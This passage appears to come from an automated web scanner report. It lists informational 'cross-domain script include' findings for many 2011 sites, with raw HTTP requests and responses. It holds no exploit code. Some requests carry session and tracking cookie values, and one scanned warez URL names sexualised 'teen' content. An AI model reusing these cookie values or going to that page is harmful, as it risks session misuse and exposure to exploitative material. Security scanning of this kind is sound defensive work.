Content-Length: 12801

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

21.1079. http://www.google.com/intl/en/options/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/intl/en/options/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

GET /intl/en/options/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sun, 02 Jan 2011 19:40:45 GMT
Date: Mon, 24 Jan 2011 16:39:53 GMT
Expires: Mon, 24 Jan 2011 16:39:53 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Connection: close

...<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<base href="http://www.google.com">
<title>More Google Products</title>
<link rel="stylesheet" href="/options/default.css">

<div id="id">

<
...[SNIP]...
</div>

<script src="//www.google-analytics.com/ga.js"></script>
...[SNIP]...

21.1080. http://www.google.com/support/chrome/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/chrome/bin/answer.py

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

21.1081. http://www.google.com/support/websearch/bin/answer.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/support/websearch/bin/answer.py

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

21.1082. https://www.google.com/adsense/support/bin/request.py previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.google.com
Path:	/adsense/support/bin/request.py

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/ga.js

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D756ba543b06cbd01%26v%3D2%26c%3D8bbbe1ed%26s%3D4d3eccb4%26t%3DR%3A1%3A%26sessref%3D; Expires=Tue, 25-Jan-2011 13:44:29 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 13:14:29 GMT
Expires: Tue, 25 Jan 2011 13:14:29 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//ssl.google-analytics.com/ga.js'
type='text/javascript'></script>
...[SNIP]...

21.1083. http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goozernation.com
Path:	/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://w.sharethis.com/button/sharethis.js
http://widgets.twimg.com/j/2/widget.js
http://www.assoc-amazon.com/s/link-enhancer?tag=goozer-20&o=1

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 75a2a69c945fc9bbaf3897f5bc47b14f=dp2ff9jkt3mlta9rvo5qn02g00; path=/
Last-Modified: Tue, 25 Jan 2011 05:05:19 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&charset=utf-8&style=rotate&publisher=&headerbg=%23000099&inactivebg=%23CCCCCC&inactivefg=%23000000&linkfg=%23000099&services=reddit%2Cdigg%2Cfacebook%2Cmyspace%2Cdelicious%2Cstumbleupon%2Ctechnorati%2Cgoogle_bmarks%2Cyahoo_bmarks%2Cyahoo_myweb%2Cwindows_live%2Cpropeller%2Cfriendfeed%2Cnewsvine%2Cxanga%2Cmixx%2Cblinklist%2Cfurl%2Cmagnolia%2Cmister_wong%2Cn4g%2Cblogmarks%2Cfaves%2Ccurrent%2Csimpy%2Cslashdot%2Cmeneame%2Cyigg%2Coknotizie%2Cfresqui%2Cdiigo%2Ccare2%2Cfunp%2Ckirtsy%2Chugg%2Csphinn"></script>
...[SNIP]...
<p>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/link-enhancer?tag=goozer-20&o=1">
</script>
...[SNIP]...

21.1084. http://www.greenmaven.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greenmaven.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/cse/brand?form=cse-search-box...=en

Request

GET / HTTP/1.1
Host: www.greenmaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1085. http://www.groupon.com/washington-dc/subscribe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.groupon.com
Path:	/washington-dc/subscribe

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js
http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv
http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC
http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1
http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL
http://www.googleadservices.com/pagead/conversion.js

Request

GET /washington-dc/subscribe HTTP/1.1
Host: www.groupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 04:41:03 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:03 GMT
Set-Cookie: area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:03 GMT
Set-Cookie: b=50b9def2-283d-11e0-baec-005056955ff3; path=/; expires=Mon, 25-Jan-2021 04:41:03 GMT
Set-Cookie: s=50b9ecd0-283d-11e0-baec-005056955ff3; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: opt_default=everyscape; path=/; expires=Fri, 25-Jan-2013 04:41:03 GMT
Set-Cookie: opt_everyscape_v=2; path=/; expires=Fri, 25-Jan-2013 04:41:03 GMT
Set-Cookie: visited=true; path=/; expires=Mon, 25-Jan-2021 04:41:03 GMT
Set-Cookie: _thepoint=6852e11ca9c5d4ffe0ea0a6c4fc641c7; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:03 GMT; HttpOnly
Status: 200
ETag: "26024001126e5388595773093590f729"
X-S-COOKIE: 50b9ecd0-283d-11e0-baec-005056955ff3
X-B-COOKIE: 50b9def2-283d-11e0-baec-005056955ff3
X-Runtime: 69
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 24862
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL" type="text/javascript"></script>
<script src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1" type="text/javascript"></script>
...[SNIP]...

21.1086. http://www.hashemian.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hashemian.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://google.com/coop/cse/brand?form=searchbox_000349523585929632139%3Ampsahfy4uju
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js
http://xslt.alexa.com/site_stats/js/t/a?url=hashemian.com

Request

GET / HTTP/1.1
Host: www.hashemian.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:53 GMT
Server: Apache/2.2.15
Vary: Host
Accept-Ranges: bytes
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25523

<html>
<head>
<title>Free Web Tools, Financial Markets Book, Financial Blog, Hashemian</title>
<meta name="description" content="Free Web Tools, the book Financial Markets For The Rest Of Us. Lates
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_000349523585929632139%3Ampsahfy4uju"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</span-->
<SCRIPT type='text/javascript' language='JavaScript' src='http://xslt.alexa.com/site_stats/js/t/a?url=hashemian.com'></SCRIPT>
...[SNIP]...
</table>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1087. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heroturko.org
Path:	/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...
<meta name="hotfile" content="hotfile.com-SOUL-65187c3c8ab7cfb">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=freshwap"></script>
...[SNIP]...

21.1088. http://www.hotelcoupons.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotelcoupons.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S0244
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.hotelcoupons.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21491
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSSQSDQC=DNBEMMLCBPOAIFFKBFHHMBOM; path=/
X-Powered-By: ASP.NET
ServerId: 1
Server: Norfolk
Date: Tue, 25 Jan 2011 00:03:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=G07610&bpid=S0244"></script>
...[SNIP]...

21.1089. http://www.huddletogether.com/projects/lightbox2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huddletogether.com
Path:	/projects/lightbox2/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /projects/lightbox2/ HTTP/1.1
Host: www.huddletogether.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:07 GMT
Server: Apache
Last-Modified: Wed, 10 Mar 2010 20:38:11 GMT
ETag: "a0be022-3006-4817846d0f2c0"
Accept-Ranges: bytes
Content-Length: 12294
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>

<title>Lightbox 2<
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.1090. http://www.huffingtonpost.com/2008/11/16/paul-mccartney-hopes-to-r_n_144138.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/2008/11/16/paul-mccartney-hopes-to-r_n_144138.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1295890410&extra3
http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295890410&extra6

Request

GET /2008/11/16/paul-mccartney-hopes-to-r_n_144138.html HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 318812
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 04:41:08 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 04:41:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js&1295890410&extra6" ></script>

    <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Ccookiesmin.js%2Cjsonmin.js%2Chp_track.js%2Chp_util.js%2Ccommon.js%2Clightboxes.js%2Cprovider.js%2Cposts.js%2Cshare.js%2Cquickview.js%2Cflashobjectmin.js%2Clazyload-min.js%2Cfacebook.js%2Csnproject.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Csharer.js%2Chuff_promo.js%2Cuser_levels.js%2Cpopup.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Capp-feeds.js%2Chptwitter.js%2Csitemode.js&1295890410&extra3"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=modules%2Fcomments.js-min&v3d20110114"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

21.1091. http://www.iloubnan.info/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iloubnan.info
Path:	/artsandculture/actualite/id/47982/theme/111/titre/Raquel-Boldorini-in-concert-at-AUB-s-Assembly-Hall/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

21.1092. http://www.jgerman.de/news/projekt/joomla-16-ist-fertig.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jgerman.de
Path:	/news/projekt/joomla-16-ist-fertig.html

Issue detail

The response dynamically includes the following script from another domain:

http://head.jgerman.de/templates/yoo_phoenix/lib/gzip/js.php?id=5412bb890f41ff7ecd8a59eba1da341d

Request

GET /news/projekt/joomla-16-ist-fertig.html HTTP/1.1
Host: www.jgerman.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1093. http://www.joomla-ua.org/content/view/400/10/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla-ua.org
Path:	/content/view/400/10/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /content/view/400/10/ HTTP/1.1
Host: www.joomla-ua.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 24 Jan 2011 16:04:09 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.2.10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 40cf95daa28915bd744253aab220bb63=-; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:09 GMT
Content-Length: 36298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk" xml:lang="uk">
<head>

...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1094. http://www.joomla.cat/notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.cat
Path:	/notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui

Issue detail

The response dynamically includes the following script from another domain:

http://www.navegaencatala.cat/giny/giny-1-g.js

Request

Response

21.1095. http://www.joomla.gr/--46/93-joomla-1-6/447-joomla-new-1-6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.gr
Path:	/--46/93-joomla-1-6/447-joomla-new-1-6

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /--46/93-joomla-1-6/447-joomla-new-1-6 HTTP/1.1
Host: www.joomla.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1096. http://www.joomla.it/notizie/4691-e-arrivato-joomlar-160.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.it
Path:	/notizie/4691-e-arrivato-joomlar-160.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://partner.googleadservices.com/gampad/google_service.js

Request

GET /notizie/4691-e-arrivato-joomlar-160.html HTTP/1.1
Host: www.joomla.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1097. http://www.joomla.org/site-search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.org
Path:	/site-search.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/afsonline/show_afs_search.js

Request

GET /site-search.html HTTP/1.1
Host: www.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.5.10.1295835652; 205e0a4a54bf75ec79a0fa3b9dc85fc0=41c830520f611d83ab14393c6f4ccb01;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...

21.1098. http://www.joomla.org.hu/joomla/46-kiadasok/272-megerkezett-a-joomla-16.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.org.hu
Path:	/joomla/46-kiadasok/272-megerkezett-a-joomla-16.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

21.1099. http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomla.org.tw
Path:	/news/joomla-official-news/163-joomla16-arrived

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /news/joomla-official-news/163-joomla16-arrived HTTP/1.1
Host: www.joomla.org.tw
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a798c6463d2f54ee9d166568119e0c09=806uqp0b11fh0lrh0emunokum3; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 56494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-tw" lang="zh-tw" dir="
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</span><script src='http://static.ak.fbcdn.net/connect.php/js/FB.Share' type='text/javascript'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=eyesofkids"></script>
...[SNIP]...

21.1100. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlacommunity.eu
